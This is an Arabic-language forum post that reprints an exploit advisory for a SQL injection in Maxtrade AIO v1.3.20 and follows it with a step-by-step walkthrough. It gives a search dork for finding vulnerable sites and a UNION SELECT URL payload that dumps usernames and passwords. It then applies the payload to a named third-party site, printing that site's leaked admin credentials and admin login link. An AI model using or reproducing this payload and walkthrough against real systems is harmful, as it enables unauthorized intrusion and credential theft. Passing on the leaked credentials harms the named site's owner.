السلام عليكم ورحمة الله وبركته
بسم الله الرحمن الرحيم
شلونكم شباب ان شاء الله بخير
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Maxtrade AIO v.1.3.20 ( modules.php ) SQL Injection Vulnerability
كود PHP:
#######################################################
# Maxtrade AIO v.1.3.20 ( modules.php ) SQL Injection Vulnerability
#
# Author : Mr JAMRA
#
# Email : JAMRA-NoT-Dead[at]Live[dot]Fr
#
(:
#
# Script Home Page : http://www.softdivision.com/
#
# Demo : http://www.softdivision.com/maxtradedemo/
#
# Dork : inurl:newsbox.php?stranica
########################################################
# Exploit :
# www.[sitename].com/modules.php?module=auto&function=autopotype&stranica=menu&cat=0&type=-6+union+select+1,concat(user_name,0x3a,user_pass)+from+users
#
# Live Demo:
# http://www.softdivision.com/maxtradedemo/modules.php?module=auto&function=autopotype&stranica=menu&cat=0&type=-6+union+select+1,concat(user_name,0x3a,user_pass)+from+users
#
# Admin login :
# http://www.[sitename].com/admin/login.php
#########################################################
# Greetz :
Devel Pal # Exploit # Mr YAssine
M-R-C ----> Team Hacker Of maROCK
#########################################################
والان الشرح :-
دورك البحث : inurl:newsbox.php?stranica
ناخذ مثلاً هذا الموقع :
buy and sell nigeria
نكتب الأستغلال بعده :
كود PHP:
modules.php?module=auto&function=autopotype&stranica=menu&cat=0&type=-6+union+select+1,concat(user_name,0x3a,user_pass)+from+users
راح تشوفون طلع الباسوورد و أسم المستخدم بالتايتل Title :
Username : admin_aft
Password : aft6575
ندخل لوحة التحكم :
http://buyandsellnigeria.com/admin/login.php
بأضافة
admin/login.php
بعد رابط الموقع
انشاء الله استفدتم من الشرح